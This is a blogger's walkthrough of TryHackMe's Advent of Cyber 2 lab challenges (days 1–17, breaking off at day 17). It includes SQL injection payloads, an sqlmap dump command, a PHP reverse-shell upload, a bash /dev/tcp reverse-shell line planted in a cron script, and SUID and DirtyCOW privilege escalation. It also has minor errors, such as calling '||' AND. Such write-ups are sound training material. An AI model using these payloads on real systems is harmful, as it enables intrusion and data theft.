Advent of Cyber 2 is an event by TryHackMe where they release 25 CTF challenges (1 per day) leading up to Christmas day! I missed out last year so here I am in 2020 tryna crack all 25 challenges! I will be updating this post (hopefully daily) as more challenges are released. Lets see if I will be able to crack all 25. Hacky Holidays! :)
After last year's shenanigans where Elf McElferson and Elf McSkidy were on damage control mode the entirety of December, McSkidy vowed to never let that happen again. The previous Christmas period was extremely stressful with the Christmas Monster managing to compromise every system within Santa's corporate infrastructure to prevent Christmas from happening. Is Christmas still in danger this year?
-Backstory
Prerequisite
As always, just make sure that the VPN connection is active and ready to go 😊
sudo openvpn /path/to/file.ovpn
Okay now onto the challenges!
[Day 1] A Christmas Crisis
Web Exploitation | HTTP | Cookies
Having read the lengthy dossier, you get ready to hack your way back into Santa's Christmas Control Centre! You enter the IP address at the top of the screen into your browser search bar and press enter to load the page.
Accessing the IP via a browser returns the target web app that was meant to be exploited. First thing I did was to create an account and login.
All controls were turned off by the "attacker". At this point it was clear that some sort of privilege escalation had to be done to get to santa's account so that all controls can be turned on. I started inspecting the site as per normal. (robots.txt, html/css inspection, session storage/cookie values)
Cookie
On closer inspection I realized that there was a cookie named auth
and it's value was encoded in hexadecimal.
decoded cookie value
While decoding, I realized that the username was exposed. Thus, to become the santa user I encoded the same string but with the username santa
, modified the cookie value with the new value I got and finally hit refresh.
And....that's how I gained access to "Santa's" account. After switching all the control's status to active, I was also awarded the flag for this challenge.
[Day 2] The Elf Strikes Back!
Web Exploitation | RCE
For Elf McEager:
You have been assigned an ID number for your audit of the system:ODIzODI5MTNiYmYw
. Use this to gain access to the upload section of the site.
Good luck!
Accessing the IP via a browser returns the target web app that was meant to be exploited.
I was told to enter an ID as the GET
parameter. However, I entered a blank GET
= ?id=
and I was redirected to a file upload page.
I also realized that there was a /upload/
directory that was accessible by the public.
I was quick to realize that this was a file upload vulnerability. While inspecting the file upload page's source code, I realized that it only accepted jpeg
, jpg
and png
I started off by grabbing one of the default shells in kali from
┌──(nee㉿kali)-[~/boxes/thm/christmas/day2]
└─$ ls /usr/share/webshells/php/
I then renamed the file to php-reverse-shell.jpg.php
. This was to evade the front end file check. Followed by this, I was able to upload the reverse shell onto the server.
I then fired up netcat and setup a listening connection via the port specified in the reverse shell file.
Lastly, I triggered the file by simply accessing it via the /uploads/
directory which I discovered earlier and got a responsive shell!
andddd....flag! 🙋♂️
[Day 3] Christmas Chaos
Web Exploitation | Authentication Bypass
McSkidy runs to the room, slamming open the door to see Santa's sleighs control panel lite up in red error messages! "Santa sleigh! It's been hacked, code red.. code red!" he screams as he runs back to the elf security command center._ _Can you help McSkidy and his team hack into Santa's Sleigh to re-gain control?
Wordlist
Given to assist with the process.
Username
Password
root
root
admin
password
user
12345
Accessing the IP via a browser returns the target web app that was meant to be exploited.
I was quick to realize that this had something to do with brute forcing the login credentials.
First thing I did was to setup my proxy and launch [burpsuite](https://portswigger.net/burp)
and add the target url to my scope. (This was to prevent intercepting other traffic on my machine)
Next, I entered a set of incorrect credentials to capture the login request to the server. This was so that I could repeat the requests with credentials from the wordlist provided.
I was able to see the username and password field and its values in the request that I captured with my proxy (Burpsuite).
I then sent the request to [Intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder/using)
to continue with the attack.
In intruder, we are able to set the field that we would like to fuzz. In this case, I set the username and password as the fields to fuzz.
Next, I pasted imported the wordlist into the payload set 1 and 2 respectively for username & password and fired off the attaccccc.
As seen above, one of my payloads' response length was shorter than the others. This could mean that those were the right set of credentials. Thus, I proceeded to login with these credentials.
And....I was presented with the flag after logging in with the brute forced credentials! GGs.
[Day 4] Santa's watching
Web Exploitation | Authentication Bypass
Our malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of YYYYMMDD. We also know that the API takes a date in the form of YYYYMMDD. Aid in the recovery of Elf's forums!
This is what I was provided with when accessing the site.
I started off with a gobuster
scan against the box to discover the API
directory.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day4] └─$ gobuster dir -u http://10.10.116.182/ -w /usr/share/wordlists/dirb/big.txt
After finding the API, I moved on to fuzzing the API
with the wordlist that was provided by THM. I knew that the API
took in a date parameter. Thus I formed a wfuzz
command that fuzzes a data parameter with the given wordlist.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day4] └─$ wfuzz -c -z file,wordlist -d "date=FUZZ" -u 10.10.116.182/api/site-log.php
-c = Shows the output in color -d = Specify the parameters you want to fuzz with -z = Specifies what will replace FUZZ in the request -u = Target URI
After the attack completed I realized that one of the responses had some characters in the response. Thus, I went to check it out.
And that's how I solved day 4's challenge!
[Day 5] Someone stole Santa's gift list!
Web Exploitation | SQLi | PHP
After last year's attack, Santa and the security team have worked hard on reviving Santa's personal portal. Hence, 'Santa's forum 2' went live.
After the attack, logs have revealed that someone has found Santa's panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On 10.10.206.123:8000 you'll find the copy of the website and your goal is to replicate the attacker's actions by dumping the gift list!
This is what I was provided with when accessing the site.
The first task was to find santa's login panel.
Without using directory brute forcing, what's Santa's secret login panel?
HINT: The name is derived out of 2 words from this question. /stap*l
The panel could be found at:
http://10.10.206.123:8000/santapanel
A simple SQL Injection payload allows us to bypass the login screen and login to the portal as santa~!
' or true -- admin' or 1=1 --
After bypassing the login page, I was greeted with a portal search access to the database. I decided to fire up burp and capture the search request.
Now that I had the search request, I proceeded to run SQLmap on the request file to see if the GET parameter search
was injectable.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day5] └─$ sqlmap -r search.req --tamper=space2comment --dump-all --dbms sqlite
-r = request file --tamper = the string given to us to bypass the WAF --dump-all = dumps all the entries in the database --dbms = to specify the backend database that santa is using
And with that, day 5's challenge is over!
[Day 6] Be careful with what you wish on a Christmas night
Web Exploitation | Javascript | XSS
This year, Santa wanted to go fully digital and invented a "Make a wish!" system. It's an extremely simple web app that would allow people to anonymously share their wishes with others. Unfortunately, right after the hacker attack, the security team has discovered that someone has compromised the "Make a wish!". Most of the wishes have disappeared and the website is now redirecting to a malicious website. An attacker might have pretended to submit a wish and put a malicious request on the server! The security team has pulled a back-up server for you on 10.10.66.131:5000. Your goal is to find the way the attacker could have exploited the application.
This is what I was provided with when accessing the site.
There wasn't a flag to uncover in this challenge. The main goal was to find the way the attacker could have exploited the application.
I fired up ZAP and started an Automated Scan against the website.
ZAP was quick in finding out that there were 2 Cross Site Scripting vulnerabilities that could be abused.
That was pretty easy. However, I wanted to test it out for myself and see if the site was actually vulnerable. Here's how I did it.
I generated this payload which I could inject into the wishes
database and trigger a persistent XSS attack. So, whenever someone views this page, they'll see my logo and when they mouse over it, an alert will pop up saying "Nee was here."
That's the end of day 6!
[Day 7] The Grinch Really Did Steal Christmas
Network | Wireshark | Packet Analysis
It's 6 AM and Elf McSkidy is clocking-in to The Best Festival Company's SOC headquarters to begin his watch over TBFC's infrastructure. After logging in, Elf McEager proceeds to read through emails left by Elf McSkidy during the nightshift.
More automatic scanning alerts, oh look, another APT group. It feels like it's going to be a long, but easy start to the week for Elf McEager.
Whilst clearing the backlog of emails, Elf McEager reads the following: "URGENT: Data exfiltration detected on TBFC-WEB-01". "Uh oh" goes Elf McEager. "TBFC-WEB-01? That's Santa's webserver! Who has the motive to steal data from there?!". It's time for the ever-vigilant Elf McEager to prove his salt and find out exactly what happened.
Unknowingly to Elf McEager, Elf McSkidy made this all up! Fortunately, this isn't a real attack - but a training exercise created ahead of Elf McEager's performance review.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day7] └─$ ls -lah total 8.5M drwxr-xr-x 2 nee nee 4.0K Dec 7 13:30 . drwxr-xr-x 6 nee nee 4.0K Dec 7 13:30 .. -rwxrw-rw- 1 nee nee 4.2M Dec 7 13:29 aoc-pcaps.zip -rw-r--r-- 1 nee nee 3.7M Nov 30 17:16 pcap1.pcap -rw-r--r-- 1 nee nee 35K Nov 30 17:37 pcap2.pcap -rw-r--r-- 1 nee nee 598K Nov 30 19:48 pcap3.pcap ┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day7] └─$
I was given 3 files to investigate.
Challenge 1
The first challenge was to find out which IP address initiates an ICMP/ping
in pcap1.pcap
For this challenge , I filtered the traffic by protocol and viewed the first entry that was returned.
The source that initiated the ping request was 10.11.3.2
Challenge 2
The next challenge was to be able to construct a simple filter in wireshark that would only return all the HTTP GET requests.
This can be done with basic filter as follows
http.request.method
http.request.method == GET
The next part to this challenge was to find out what the name of the article that the IP address 10.10.67.199
visited was. For this, I chained 2 filters together to narrow down my traffic.
ip.src == 10.10.67.199 || http.request.method == GET
|| = AND
This filter led me to a packet where it was sending a GET
request to /posts
. Thus, I followed the traffic and investigated more.
And in that stream was the name of the article! reindeer-of-the-week
For the next challenge, I was given a pcap file and asked to retrieved the password that was leaked via the FTP
protocol during the login process.
I opened the pcap file with wireshark and filtered for FTP traffic.
On inspection, I realized that there was a packet with the info Please specify the password
. I followed the TCP stream of that particular packet and was presented with the password.
Challenge 3
And for the last challenge, I was given another pcap file and asked to discover what was on Elf McSkidy's wishlist that will be used to replace Elf McEager.
The first thing I did was to see if there was any HTTP objects that I could export. To my surprise, there was a file named christmas.zip
that was transmitted during the packet capture.
I then proceeded to save this zip file and investigate it further.
Unzipping the file gave me access to 6 files. However, I was only interested to look at one file in particular. It was elf_mcskidy_wishlist.txt
.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day7/christmas] └─$ cat elf_mcskidy_wishlist.txt
Wish list for Elf McSkidy
Budget: £100
x3 Hak 5 Pineapples x1 Rubber ducky (to replace Elf McEager)
And there it was. The answer to What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?
.
That concludes day 7 of the event!
[Day 8] What's Under the Christmas Tree?
Networking | NMAP
After a few months of probation, intern Elf McEager has passed with glowing feedback from Elf McSkidy. During the meeting, Elf McEager asked for more access to The Best Festival Company's (TBFC'z) internal network as he wishes to know more about the systems he has sworn to protect.
Elf McSkidy was reluctant to agree. However, after Elf McEager's heroic actions in recovering christmas, Elf McSkidy soon thought this was a good idea. This was uncharted territory for Elf McEager - he had no idea how to begin finding out this information for his new responsibilites. Thankfully, TBFC has a wonderful up-skill program covering the use of Nmap for ElfMcEager to enrol in.
Target = 10.10.214.172 // I've added an entry in my hosts file to this IP
Since the day was based around NMAP
, I fired off my NMAP scan even before reading the challenge questions.
┌──(nee㉿kali)-[~] └─$ nmap -sC -sV -A tbfc.blog
Nmap scan report for tbfc.blog (10.10.214.172) Host is up (0.35s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: Hugo 0.78.2 |_http-server-header: Apache/2.4.29 (Ubuntu) |http-title: TBFC's Internal Blog 2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 cf:c9:99:d0:5c:09:27:cd:a1:a8:1b:c2:b1:d5:ef:a6 (RSA) | 256 4c:d4:f9:20:6b:ce:fc:62:99:54:7d:c2:b4:b2:f2:b2 (ECDSA) | 256 d0:e6:72:18:b5:20:89:75:d5:69:74:ac:cc:b8:3b:9b (ED25519) 3389/tcp open ms-wbt-server xrdp 49157/tcp filtered unknown Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Challenge 1
The challenge was to find the ports that were open & hosting services and arrange them in ascending order.
That wasn't too hard, thanks to the NMAP scan I kicked off earlier.
80 = Web
2222 = SSH //SeCuRiTy ThOrUgH ObScUrIty
3380 = RDP
Challenge 2
The next challenge was to find the distribution of Linux the machine was using.
This was pretty straight forward due to the scan I ran earlier. But to be exact the option -A
assisted with this one. (Aggressive scan)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
Challenge 3
The last challenge was to use NMAP's Network Scripting Engine to retrieve the HTTP-TITLE
of the web server and infer what the site could've been used for.
The option -sC
came in clutch for this challenge. -sC
Performs a script scan using the default set of scripts NMAP has in store.
80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: Hugo 0.78.2 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: TBFC's Internal Blog
Thus, I concluded that the site was being used as a blog
.
And....that's about it for day 8!
[Day 9] Anyone can be Santa!
Networking | FTP
Even Santa has been having to adopt the "work from home" ethic in 2020. To help Santa out, Elf McSkidy and their team created a file server for The Best Festival Company (TBFC) that uses the FTP protocol. However, an attacker was able to hack this new server. Your mission, should you choose to accept it, is to understand how this hack occurred and to retrace the steps of the attacker.
Target = 10.10.113.151
I started off the day with the usual NMAP scan used in one of the previous days and these were my results
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day9] └─$ nmap -Pn -sC -sV -A -oN initial.nmap 10.10.113.151
Nmap scan report for 10.10.113.151 Host is up (0.35s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxr-xr-x 2 0 0 4096 Nov 16 15:04 backups | drwxr-xr-x 2 0 0 4096 Nov 16 15:05 elf_workshops | drwxr-xr-x 2 0 0 4096 Nov 16 15:04 human_resources |_drwxrwxrwx 2 65534 65534 4096 Nov 16 19:35 public [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.4.16.248 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f6:ce:52:11:22:9e:b1:c0:ae:45:2a:f9:2f:70:eb:cb (RSA) | 256 4b:77:b2:d4:76:53:8c:ec:cb:be:3a:69:51:ff:3c:8f (ECDSA) | 256 53:3f:2f:ca:c2:d6:ce:ec:99:30:f7:1f:ce:a5:d7:f5 (ED25519) Service Info: Host: Welcome; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Since port 21 was open, I attempted to login to the FTP server as an anonymous user. As uncovered from the NMAP scan, anonymous users had Read/Write/Execute
permissions in the public
directory.
21/tcp open ftp vsftpd 2.0.8 or later |_drwxrwxrwx 2 65534 65534 4096 Nov 16 19:35 public [NSE: writeable]
In the directory, I noticed that there was a file named backup.sh
and in it contents was a line that went like this.
TO-DO: Automate transfer of backups to backup server
This gave me the idea of modifying this file to get a reverse shell onto the machine
bash -i >& /dev/tcp/10.4.16.248/666 0>&1
I wiped the script clean, added this one line into the file and saved it on the server. I then moved onto opening up a netcat
listener to catch the incoming traffic on port 666
.
After waiting for about 5 minutes, my theory was confirmed. I got a reverse shell back from the remote server. This meant that the backup.sh
was indeed running every few mind to back up the server contents.
:)
Before leaving the machine, I grabbed the flag located at /root/flag.txt
[Day 10] Don't be Elfish!
Networking | SMB
The Best Festival Company (TBFC) has since upscaled its IT infrastructure after last year's attack for all the other elves to use, including a VPN server and a few other services. You breathe a sigh of relief..."That's it, Me, Elf McEager saved the Christmas of 2020! I can't wait to---"
But suddenly, a cold shiver runs down your spine, interrupting your monologue...
You suddenly recall that Elf McSkidy had set up a Samba file server just before the attack occurred - could this have been hacked too?! What about our data...Oh no, quick! Find out what usernames may have been leaked and attempt to login to the server yourself, noting down any vulnerabilities found to report back to Elf McSkidy.
Target = 10.10.184.213
As always, I started off the NMAP scan before looking at the challenges and here were my results.
Nmap scan report for tar.get (10.10.184.213)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: TBFC-SMB-01)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: TBFC-SMB-01)
Service Info: Host: TBFC-SMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |clock-skew: mean: 0s, deviation: 1s, median: 0s | nbstat: NetBIOS name: TBFC-SMB, NetBIOS user: , NetBIOS MAC: (unknown) | Names: | TBFC-SMB Flags: | TBFC-SMB Flags: | TBFC-SMB Flags: | \x01\x02MSBROWSE\x02 Flags: | TBFC-SMB-01 Flags: | TBFC-SMB-01 Flags: | TBFC-SMB-01 Flags: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: tbfc-smb | NetBIOS computer name: TBFC-SMB\x00 | Domain name: \x00 | FQDN: tbfc-smb |_ System time: 2020-12-11T17:48:02+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challengeresponse: supported | messagesigning: disabled (dangerous, but default) | smb2-security-mode: | 2.02: | Message signing enabled but not required | smb2-time: | date: 2020-12-11T17:48:02 |_ start_date: N/A
The NMAP scan found some samba shared on the target machine. Thus, I decided to run enum4linux
to retrieve the users and shares hosted on the target machine.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day10] └─$ enum4linux -U tar.get
========================
| Users on tar.get |
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc: index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceager Desc: index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
user:[elfmcskidy] rid:[0x3e8] user:[elfmceager] rid:[0x3ea] user:[elfmcelferson] rid:[0x3e9]
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day10] └─$ enum4linux -S tar.get
====================================
| Share Enumeration on tar.get |
Sharename Type Comment
tbfc-hr Disk tbfc-hr tbfc-it Disk tbfc-it tbfc-santa Disk tbfc-santa IPC$ IPC IPC Service (tbfc-smb server (Samba, Ubuntu))
Now that I had the list of users and shares on the target, I tried to access the shares with the help of smbclient
and the following command below.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day10] └─$ smbclient //tar.get/tbfc-santa -U
However accessing it all 3 usernames returned a NT_STATUS_LOGON FALIURE
error. Thus, I decided to login to the share tbfc-santa
without a user parameter.
And we were in the share.
Challenge
what directory did ElfMcSkidy leave for Santa?
I opened the file note_from_mcskidy.txt
to look at the contents and this was what I found.
Challenge solved!
[Day 11] The Rogue Gnome
Networking | Privilege Escalation | Linux
This is it - the moment that Elf McEager has been waiting for. It's the final exam of the Nmap course that he enlisted on during "Day 8 - What's Under the Christmas Tree?". It looks like all that hard work of hitting the books has paid off..."Success!" Elf McEager screams..."the exploit worked! Yippeee!"
Elf McEager has successfully managed to create a reverse shell from the target back to his computer. Little did he know, the real exam begins now...The last stage of the exam requires Elf McEager to escalate his privileges! He spent so much time studying Nmap cheatsheets that he's now drawing a blank...Can you help Elf McEager?
To be the good guy, sometimes you gotta be the bad guy first...
Target = 10.10.68.216
SSH Credentials
ssh cmnatic@10.10.68.216 aoc220
I'm greeted with an account with limited privilege on login. The first thing I did was to host a simple python web server and throw my linpeas.sh
over to the target machine.
Followed by that, I made the script executable and let it run to assist with the priv escalation. This script goes around the system environment and gathers the weakest links that could be possibly exploited.
After the script had run, it returned a bunch of results. I narrowed it down to this SUID
section which is usually known to have weak configurations to allow privilege escalation.
Here I noticed that /bin/bash
had SUID set. I googled around for an exploit and found this!
sudo sh -c 'cp $(which bash) .; chmod +s ./bash'
./bash -p
Lastly, I took the flag located at /root/flag.txt
and dipped for the day!
[Day 12] Ready, set, elf.
Networking | Public Exploits
Christmas is fast approaching, yet, all remain silent at The Best Festival Company (TBFC). What gives?! The cheek of those elves - slacking at the festive period! Santa has no time for slackers in his workshop. After all, the sleigh won't fill itself, nor will the good and naughty lists be sorted. Santa has tasked you, Elf McEager, with whacking those elves back in line.
Target = 10.10.115.154
As always, I started off with an NMAP scan to recon the machine.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day12] └─$ nmap -Pn -sC -sV -A -oN initial.nmap 10.10.115.154 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( nmap.org ) at 2020-12-13 12:23 EST Nmap scan report for 10.10.115.154 Host is up (0.35s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: TBFC-WEB-01 | NetBIOS_Domain_Name: TBFC-WEB-01 | NetBIOS_Computer_Name: TBFC-WEB-01 | DNS_Domain_Name: tbfc-web-01 | DNS_Computer_Name: tbfc-web-01 | ProductVersion: 10.0.17763 | System_Time: 2020-12-13T17:23:49+00:00 | ssl-cert: Subject: commonName=tbfc-web-01 | Not valid before: 2020-12-11T21:55:21 |_Not valid after: 2021-06-12T21:55:21 |_ssl-date: 2020-12-13T17:23:55+00:00; +1s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |http-title: Service Unavailable 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.17 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.17 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
I realized that port 8080 was open on the machine and tried to access it.
I was greeted with an Apache Tomcat page. I was also told that the version in use was 9.0.17
. I then started hunting for vulnerabilities relating back to this version of apache/tomcat. Eventually, I found this exploit over at exploit-db. The best part about this exploit was that it had a Metasploit module.
Now I just had to set the appropriate params and break into the box.
Now that I had access to the machine, I just had to type
flag 1 and get out :)
And that was the end of day 12!
[Day 13] Coal for Christmas
Special by John Hammond | Privilege Escalation | DirtyCow
Target = 10.10.185.205
As always, I started off with an NMAP scan to recon the machine.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13] └─$ nmap -sC -sV -A 10.10.185.205 Nmap scan report for 10.10.185.205 Host is up (0.35s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA) 23/tcp open telnet Linux telnetd 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap done: 1 IP address (1 host up) scanned in 36.96 seconds
I realized that port 23 aka insecure TELNET
was open on the machine. Thus, I tried to access the machine via that port and got this back.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13] └─$ telnet 10.10.185.205
Username: santa Password: clauschristmas
Since port 22 aka Secure Shell
was open on the machine, I tried accessing it with the same credentials.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13] └─$ ssh santa@10.10.185.205
Those credentials worked for SSH
too!
Upon further inspection of the directory, I realized that one of the files that were in there contained snippets of an exploit named DirtyCOW
. I then proceeded to check if the kernel running on the target machine was vulnerable to that exploit.
It was. So I moved on to google search a snippet of the C code placed on the machine and ended up with this full exploit. I put the exploit on the target machine and proceeded to compile it.
$ gcc -pthread dirty.c -o dirty -lcrypt
Now all there was left to do was, run the exploit and proffffffitttt???
./dirty
Now that the exploit has successfully completed, I proceeded to login via SSH to verify that I indeed had root permissions.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13] └─$ ssh nee@10.10.185.205
Challenge
Uh oh, looks like that perpetrator left a message! Follow his instructions to prove you really did leave Coal for Christmas!
After you leave behind the coal, you can run tree | md5sum
What is the MD5 hash output?
nee@christmas:~# touch coal nee@christmas:~# tree | md5sum
That was a great challenge by John Hammond!
[Day 14] Where's Rudolph?
Special by TheCyberMentor | OSINT
'Twas the night before Christmas and Rudolph is lost
Now Santa must find him, no matter the cost
You have been hired to bring Rudolph back
How are your OSINT skills? Follow Rudolph's tracks...While hunting and searching for any hints or clues
Santa uncovers some details and shares the news
Rudolph loved to use Reddit and browsed aplenty
His username wasIGuidetheClaus2020
With the provided username, I went straight to google and discovered the reddit profile.
Challenge 1
What URL will take me directly to Rudolph's Reddit comment history?
This challenge was solved via the google query.
Challenge 2
On what other social media platform might Rudolph have an account?
Going off one of Rudolph's comments, I was able to infer that he had an account on twitter.
I was also able to find our Rudolph's twitter account via another google query.
Challenge 3
Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
Going through Rudolph's twitter, I found couple images related to a parade. I threw it into Google's reverse image search here and found the information to this challenge.
Challenge 4
Did you find a flag too?
Rudolph had posted a "high resolution" photo on twitter over here. I threw that photo into exiftool and uncovered the flag.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day14] └─$ exiftool lights-festival-website.jpg | strings | grep FLAG
Great start to OSINT challenges! Big up The Cyber Mentor!
[Day 15] There's a Python in my stocking!
Scripting | Python
Simple introduction to python.
x = [1, 2, 3]
y = x
y.append(6)
print(x)
Challenge
What is the output of the program provided in today's material?
The solution to that would actually be [1, 2, 3, 6]
. This is due to the "Pass by reference" rule.
[Day 16] Help! Where is Santa?
Scripting | Requests
Oh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?
CLUE: Santa's Sled has an API we can talk too. The key for the API is between 0 and 100, and it's an odd number. But be careful! After an unknown number of attempts, Santa's Sled will ban your IP address.
Target = 10.10.1.51
As always, I started off with an NMAP scan to recon the machine. This was to discover which port the web API was hidden on.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day16] └─$ nmap -sV -sC -A 10.10.1.51 Starting Nmap 7.91 ( nmap.org ) at 2020-12-16 11:40 EST Nmap scan report for 10.10.1.51 Host is up (0.39s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 8000/tcp open http-alt uvicorn | HTTPOptions: | HTTP/1.1 405 Method Not Allowed | date: Wed, 16 Dec 2020 16:41:00 GMT | server: uvicorn | content-length: 31 | content-type: application/json | Connection: close |_ {"detail":"Method Not Allowed"} |_http-server-header: uvicorn |_http-title: Santa's Tracker
From the NMAP scan, I found out that the webserver was hidden and running on port 8000
.
I was provided with a page filled with hyperlinks when I tried to access the webpage.
Upon inspecting the source, I found the absoloute path of the API
and its usage.
[http://10.10.1.51:8000/](http://10.10.1.51:8000/)api/{API_KEY}
Based off of the clue, The API key was an odd number and was in-between 0 and 100. Thus, I made a simple bash script to iterate through all values in-between 0 and 100. here's the script I wrote.
#!/bin/bash x=1 while [ $x -le 100 ] do curl 10.10.72.198:8000/api/$x printf "\n" x=$(( $x + 1 )) done
After running the script, I uncovered the correct API key value together with where Santa actually was. Another challenge in the bag!
[Day 17] ReverseELFneering
Reverse Engineering | GDB | Linux
McSkidy has never really touched low-level languages - this is something they must learn in their quest to defeat the Christmas monster.
Before jumping into the challenge, here are a few things I learnt about assembly along the way!
The first thing I learnt, was a tool called Radare2
. radare2 is a framework for reverse engineering and analysing binaries. It can be used to disassemble binaries(translate machine code to assembly, which is actually readable) and debug said binaries(by allowing a user to step through the execution and view the state of the program).
Here's a file named file1
and here's the output when its successfully executed.
The program adds up the value of a
and b
. It then displays the value as c
.
To see what was happening under the hood, I ran the tool mentioned above on the file with the -d
flag which specifies debug mode
.
Next, to ask the program to analyze the binary I simply responded with aa
. When using aa
the program might take 5-10 minutes to return results depending on your system. It analyses all symbols and entry points in the executable. The analysis, in this case, involves extracting function names, flow control information, and much more!
Once the analysis is complete, To find a list of the functions that was run throughout the program, I entered afl
. This stands for analyze function list
.
During analysis I realized that there was a function at main. Thus, I used the command pdf @main
to disassemble it. pdf
stands for Print Disassembly Function
.
From this, I was able to see that the instructions declare 3 variables which are all integers at the start of the program. Changes to those variables happen during the 7th instruction. Thus I moved on to set a break point using the memory offset. 0x00400b55
. I used the command db
to set a break point.
db 0x00400b55
I ran the pdf @main
command again to verify that the breakpoint was indeed set at the location that I wanted it to be at. Now that I've set a breakpoint, I ran the program using the command dc
.
Running both the dc
and pdf @main
tells me that my break point was successfully hit. From this, I could tell that the program was moving the value 4
(double word) into the variable var_ch
. The same thing happens with the value 5
and the variable var_8h
.
Next up, I wanted to view the value of the contents of the local_ch
variable. For this I needed to run a command together with the memory address of that particular variable. I uncovered the memory address using the command pdf @main
.
To view the contents, I used the command px @ rbp-0xc
.
Upon inspection of the memory location dump, I realized that 4
was nowhere to be found. After some time, I realized that my breaking point was set at the instruction. Thus, the instruction hasn't actually ran yet. To advance further, I used the command ds
.
dc = Continues until a breakpoint it hit ds = Continues to the next step in instructions
Now I was able to see the value 04
in hex!
Skipping a few instructions ahead, I saw an add
instruction which adds eax
and edx
and stores the result in eax
Now running the dr
command displayed the register variables to proof that the instructions were interpreted correctly.
The next few set of instructions involve moving the registers back into the variables so that they can be referenced when the program prints the results.
Lastly, the instructions call a printf
function before closing the program to print out the response onto the terminal.
Now that's enough of that! Onto the challenge :0 (This challenge is based off of another file that was provided)
Challenge 1
What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
I first started by running radare2
on the file with the debug flag and let it analyze the program with the command aa
.
Next, I used the pdf
command on the main
function to print the disassembly of that function. That gave me what was needed for the first challenge.
Challenge 2
What is the value of eax when the imull instruction is called?
For this, I first went ahead and set a break point at the memory address 0x00400b62
using the command db 0x00400b62
. I then ran the dc
command so that the program would continue all the way till it hits the break point.
Since the dword variable var_8h
was being moved into eax
, I dumped the memory location using the variables address. That gave the answer to this challenge.
Challenge 3
